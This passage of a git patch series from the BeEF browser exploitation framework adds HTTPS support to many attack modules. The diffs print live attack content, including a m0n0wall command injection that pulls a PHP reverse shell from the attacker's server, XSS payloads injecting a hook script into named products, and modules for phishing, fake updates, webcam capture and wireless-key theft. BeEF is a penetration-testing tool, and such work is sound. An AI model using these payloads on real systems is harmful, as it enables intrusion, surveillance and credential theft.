+    sound_file_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
 
     return [{
       'name' => 'sound_file_uri', 
diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js
index bb3465385..d3c42af0a 100644
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -43,10 +43,10 @@ beef.execute(function() {
     theHead.appendChild(style);
     
     //A nice library that helps us to include the swf file
-    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
     
     //This is the javascript that actually calls the swfobject library to include the swf file 
-    var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
     
     //Empty body first
     $j('body').html('');
diff --git a/modules/browser/webcam_permission_check/command.js b/modules/browser/webcam_permission_check/command.js
index ba7b241e4..af4ee2610 100644
--- a/modules/browser/webcam_permission_check/command.js
+++ b/modules/browser/webcam_permission_check/command.js
@@ -62,10 +62,10 @@ beef.execute(function() {
     });
         
     //A library that helps include the swf file
-    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    //var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
     
     //This is the javascript that actually calls the swfobject library to include the swf file 
-    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
     
 
     //Add flash content
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js
index 5243259e1..01d0117ef 100755
--- a/modules/chrome_extensions/inject_beef/command.js
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-        var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+        var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
 
         chrome.windows.getAll({"populate" : true}, function(windows) {
 			for(i in windows) {
diff --git a/modules/debug/test_http_bind_raw/module.rb b/modules/debug/test_http_bind_raw/module.rb
index 5eb456845..75d2bbb82 100644
--- a/modules/debug/test_http_bind_raw/module.rb
+++ b/modules/debug/test_http_bind_raw/module.rb
@@ -7,7 +7,8 @@ class Test_http_bind_raw < BeEF::Core::Command
 
   def pre_send
     configuration = BeEF::Core::Configuration.instance
-    xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
     BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
   end
 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
index dff727eb9..22702db22 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -13,6 +13,7 @@ beef.execute(function () {
 
     var beef_host = '<%= @beef_host %>';
     var beef_port = '<%= @beef_port %>';
+    var beef_proto = beef.net.httpproto;
     var beef_junk_port = '<%= @beef_junk_port %>';
     var sock_name = '<%= @beef_junk_socket %>';
 
@@ -190,7 +191,7 @@ beef.execute(function () {
     var size,host,contenttype,referer,nops = null;
     get_junk_size = function(){
         var junk_name = "";
-        var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+        var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
 
         $j.ajax({
             type: "GET",
diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
index 52cdb5128..fc2665027 100755
--- a/modules/exploits/local_host/java_payload/command.js
+++ b/modules/exploits/local_host/java_payload/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
     var conn = '<%= @conn %>';
     var cbHost = '<%= @cbHost %>';
     var cbPort = '<%= @cbPort %>';
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
 
diff --git a/modules/exploits/m0n0wall/command.js b/modules/exploits/m0n0wall/command.js
index 9501a1237..0e0981fda 100644
--- a/modules/exploits/m0n0wall/command.js
+++ b/modules/exploits/m0n0wall/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
   var lhost = '<%= @lhost %>';
   var lport = '<%= @lport %>';
 
-  var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27http%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
+  var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
   
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb
index 970693e67..a5e6b536d 100644
--- a/modules/exploits/sqlitemanager_xss/module.rb
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -8,7 +8,8 @@ class Sqlitemanager_xss < BeEF::Core::Command
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
index 5c7df6000..bbcc39d2f 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -8,7 +8,8 @@ class Alienvault_ossim_3_1_xss < BeEF::Core::Command
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url=<script src='+hook_uri+'></script>'}
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
index 5d1921f58..cc8d0732a 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -8,7 +8,8 @@ class Cisco_collaboration_server_5_xss < BeEF::Core::Command
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script src="'+hook_uri+'"></script>'}
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
index a413e5b13..68356a916 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -8,7 +8,8 @@ class Serendipity_1_6_xss < BeEF::Core::Command
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"</script><script src="'+hook_uri+'"></script>'}
diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
index 165dc1c4a..b6b9361f4 100755
--- a/modules/host/get_internal_ip/command.js
+++ b/modules/host/get_internal_ip/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-    var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
+    var applet_uri = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/';
 	var internal_counter = 0;
 	var timeout = 30;
     var output;
diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js
index 05d1c07a7..4baf94a9d 100755
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -5,7 +5,7 @@
  */
 
 beef.execute(function() {
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
     var output;
diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
index 5c8afad87..61cddde05 100644
--- a/modules/host/get_system_info/command.js
+++ b/modules/host/get_system_info/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
 	var timeout = 30;
 	var output;
 
-	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', "http://"+beef.net.host+":"+beef.net.port+"/", null, null);
+	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', ibeef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
 
 	if (beef.browser.isFF()) {
 
diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java
index 2c912cc76..f90984200 100644
--- a/modules/host/get_system_info/getSystemInfo.java
+++ b/modules/host/get_system_info/getSystemInfo.java
@@ -152,7 +152,7 @@ public class getSystemInfo extends Applet {
                 }
         } else {
                 //Trying to insert the Beeffeine applet
-                content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
+                content = "<APPLET code='Beeffeine' codebase='"+beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
                 $j('body').append(content);
                 internal_counter = 0;
                 //We have to kick off a loop now, because the user has to accept the running of the applet perhaps
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js
index f40859427..8559a4637 100644
--- a/modules/host/get_wireless_keys/command.js
+++ b/modules/host/get_wireless_keys/command.js
@@ -5,7 +5,7 @@
  */
 
 beef.execute(function() {
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
     var output;
diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js
index ba4e65dbe..b008bd100 100644
--- a/modules/host/hook_default_browser/command.js
+++ b/modules/host/hook_default_browser/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 	
-	var pdf_url =  'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
+	var pdf_url =  beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
 	window.open( pdf_url, '_blank');
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb
index dbbca47d1..f85f6e8af 100644
--- a/modules/host/hook_default_browser/module.rb
+++ b/modules/host/hook_default_browser/module.rb
@@ -8,7 +8,8 @@ class Hook_default_browser < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
     return [
         #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },
     ]
@@ -16,11 +17,12 @@ class Hook_default_browser < BeEF::Core::Command
 
   def pre_send
 
-    #Get the servers configurations.
-    configuration = BeEF::Core::Configuration.instance
+		#Get the servers configurations.
+		configuration = BeEF::Core::Configuration.instance
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
 		
 		#The hook url to be replace the token in the original pdf file.
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
 		
 		# A new pdf file containg the actual hook URI instead of the dummy token.
 		configured_hook_file = File.open("./modules/host/hook_default_browser/bounce_to_ie_configured.pdf","w")
diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js
index 4c2bd70d9..65edd2462 100644
--- a/modules/misc/iframe_sniffer/command.js
+++ b/modules/misc/iframe_sniffer/command.js
@@ -24,7 +24,7 @@ beef.execute(function() {
     var leakyscript = document.createElement('script');
 
     leakyscript.setAttribute('type', 'text/javascript');
-    leakyscript.setAttribute('src', 'http://'+beef.net.host+':'+beef.net.port+'/leakyframe.js');
+    leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js');
     var theparent = document.getElementsByTagName('head')[0];
     theparent.insertBefore(leakyscript, theparent.firstChild);
   }
diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js
index bac612bd1..0c4307722 100644
--- a/modules/network/DOSer/command.js
+++ b/modules/network/DOSer/command.js
@@ -12,19 +12,19 @@ beef.execute(function() {
     var post_data = '<%= @post_data %>';
 
     if(!!window.Worker){
-    var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
+      var myWorker = new Worker(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/worker.js');
 
-    myWorker.onmessage = function (oEvent) {
+      myWorker.onmessage = function (oEvent) {
         beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
-    };
+      };
 
-        var data = {};
-        data['url'] = url;
-    data['delay'] = delay;
-    data['method'] = method;
-    data['post_data'] = post_data;
+      var data = {};
+      data['url'] = url;
+      data['delay'] = delay;
+      data['method'] = method;
+      data['post_data'] = post_data;
 
-    myWorker.postMessage(data);
+      myWorker.postMessage(data);
     }else{
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
     }
diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js
index 2c2e07802..75304958d 100644
--- a/modules/network/ping_sweep_java/command.js
+++ b/modules/network/ping_sweep_java/command.js
@@ -15,7 +15,7 @@ beef.execute(function() {
     var internal_counter = 0;
     var firstMsgSent = false;
 
-    beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]);
+    beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]);
 
 		function waituntilok() {
 			try {
diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js
index cc3aabd4f..9ed5b6beb 100644
--- a/modules/persistence/popunder_window/command.js
+++ b/modules/persistence/popunder_window/command.js
@@ -8,7 +8,7 @@ beef.execute(function() {
 	
 	var result = "Pop-under window successfully created!";
 
-	window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
+	window.open(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
 
 	window.focus();	
 
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb
index 210a634da..7c262bbe9 100644
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -11,6 +11,7 @@ class Phonegap_persistence < BeEF::Core::Command
   def self.options
 
     @configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
     beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
     beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
 
@@ -18,7 +19,7 @@ class Phonegap_persistence < BeEF::Core::Command
       'name' => 'hook_url',
       'description' => 'The URL of your BeEF hook',
       'ui_label'=>'Hook URL',
-      'value' => 'http://'+beef_host+':'+beef_port+'/hook.js',
+      'value' => proto + '://'+beef_host+':'+beef_port+'/hook.js',
       'width' => '300px'
     }]
   end
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
index 3524ddba3..809e07a88 100644
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -9,7 +9,8 @@ class Clickjacking < BeEF::Core::Command
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjacking/clickjack_victim.html"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjacking/clickjack_victim.html"
 
 		return [
 		{'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' => uri, 'width' => '400px', 'height' => '50px'},
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index cbdfaf4ff..25ed298f5 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -7,8 +7,9 @@ class Fake_flash_update < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    payload_root = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
-    image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
+    image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
 
     return [
         {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb
index fba9d4154..b7e5a2055 100644
--- a/modules/social_engineering/fake_notification_ff/module.rb
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -7,8 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
     beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+    url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
     return [
       {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
       { 'name' => 'notification_text',
diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb
index 46e32c154..801ae48b7 100644
--- a/modules/social_engineering/gmail_phishing/module.rb
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -7,8 +7,8 @@ class Gmail_phishing < BeEF::Core::Command
 
   def self.options
      configuration = BeEF::Core::Configuration.instance
-
-     xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+     proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+     xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
      logout_gmail_interval = 10000
      wait_seconds_before_redirect = 1000
      return [
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index 07e1aea9b..e8bd1fc6e 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -7,7 +7,8 @@ class Pretty_theft < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    logo_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
     return [
 		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
        		
diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb
index bae133509..cc32a7f42 100644
--- a/modules/social_engineering/replace_video_fake_plugin/module.rb
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -7,8 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
     beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port")
+    url = proto + '://' + beef_host + ':' + @configuration.get("beef.http.port")
     return [
         {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
         {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
diff --git a/modules/social_engineering/tabnabbing/module.rb b/modules/social_engineering/tabnabbing/module.rb
index 3532efce9..d6e9698d8 100644
--- a/modules/social_engineering/tabnabbing/module.rb
+++ b/modules/social_engineering/tabnabbing/module.rb
@@ -7,7 +7,8 @@ class Tabnabbing < BeEF::Core::Command
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
 		return [
 			{ 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width'=>'400px' },
 			{ 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width'=>'150px' }

From 858814c6141643656c945f94ae842bab5f03c776 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 9 Aug 2013 13:28:35 +0930
Subject: [PATCH 359/397] Update BeEF core to complete HTTPS support

Part of issue #745
---
 core/main/client/browser.js | 2 +-
 core/main/server.rb         | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 9b3e8fd9a..90d9d59cc 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1357,7 +1357,7 @@ beef.browser = {
         // Inject an unsigned java applet to double check if the Java
         // plugin is working fine.
         try {
-            var applet_archive = 'http://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
+            var applet_archive = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/checkJava.jar';
             var applet_id = 'checkJava';
             var applet_name = 'checkJava';
             var output;
diff --git a/core/main/server.rb b/core/main/server.rb
index f9a22a245..4535d48fb 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -22,9 +22,10 @@ module BeEF
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
+        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
         beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
         beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "http://#{beef_host}:#{beef_port}"
+        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
         @root_dir = File.expand_path('../../../', __FILE__)
         @command_urls = {}
         @mounts = {}

From f2883e0c94b4f7d7445dae0bc6e1714ca0d7db6b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 9 Aug 2013 13:34:24 +0930
Subject: [PATCH 360/397] Fixed typo

Extra 'i' from vim insert mode
---
 modules/host/get_system_info/command.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js
index 61cddde05..03fc0ae21 100644
--- a/modules/host/get_system_info/command.js
+++ b/modules/host/get_system_info/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
 	var timeout = 30;
 	var output;
 
-	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', ibeef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
+	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
 
 	if (beef.browser.isFF()) {
 

From 173178e1d6283247b38f0d9860d125233b9a0410 Mon Sep 17 00:00:00 2001
From: Finn Herzfeld <thefinn93@thefinn93.com>
Date: Sun, 11 Aug 2013 00:07:59 -0700
Subject: [PATCH 361/397] Updated text as requested by bcoles

---
 config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

